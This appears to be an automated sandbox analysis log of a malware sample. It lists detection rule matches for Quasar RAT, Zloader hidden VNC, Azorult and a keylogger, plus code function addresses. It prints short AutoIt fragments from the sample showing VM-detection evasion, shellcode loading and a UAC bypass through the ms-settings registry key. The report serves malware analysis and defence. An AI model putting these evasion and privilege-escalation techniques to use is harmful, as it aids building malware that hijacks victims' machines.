                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload; Author: kevoreilly
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload; Author: kevoreilly
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects Zloader hidden VNC Author: @VK_Intel
                      Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects Zloader hidden VNC Author: @VK_Intel
                      Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                      Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects Zloader hidden VNC Author: @VK_Intel
                      Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects Zloader hidden VNC Author: @VK_Intel
                      Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                      Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: This is a third-party compiled AutoIt script. | 1_2_00DB3B3A
Source: CVbJSUXraQ.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: This is a third-party compiled AutoIt script. | 7_2_00DB3B3A
Source: CVbJSUXraQ.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: This is a third-party compiled AutoIt script. | 10_2_00A43B3A
Source: SystemPropertiesPerformance.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
AutoIt script contains suspicious strings
Source: CVbJSUXraQ.exe | AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: CVbJSUXraQ.exe | AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: CVbJSUXraQ.exe | AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: CVbJSUXraQ.exe | AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: CVbJSUXraQ.exe | AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: CVbJSUXraQ.exe | AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: SystemPropertiesPerformance.exe.1.dr | AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: SystemPropertiesPerformance.exe.1.dr | AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: SystemPropertiesPerformance.exe.1.dr | AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: SystemPropertiesPerformance.exe.1.dr | AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: SystemPropertiesPerformance.exe.1.dr | AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: SystemPropertiesPerformance.exe.1.dr | AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DBE6A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DBDF00
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DDD975
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DE62D2
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DE6DB6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DDBDA6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DC66E1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DC6F9E
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB104C
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AC50BE
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AC4C28
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AC59EA
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AC5554
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ADE153
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AC5E80
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AC6263
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ADD39B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AD2F13
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C788A0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C694B0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C63C6C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7B420
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C809D4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C72DE0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C76984
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C799B0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C84174
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7DED4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7FAD4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7EADC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C766A4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C73A10
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C687CC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C727D4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C803EC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C733EC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C84BE4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C82F5C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C6B36C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C68F68
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C78F34
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CA9878
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CAA1A4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CA9D0E
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CAAAD0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CAAEB3
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CAA63A
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CB7B63
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Code function: 6_2_00F12EC4
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Code function: 6_2_00F18FCC
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Code function: 6_2_00F17482
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DC3030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD21C5
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD1978
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DDCB21
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD25FA
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD1D90
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DC5520
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DC5760
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DBDF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A63187
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A4FCE0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A4E6A0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A4DF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00A53030
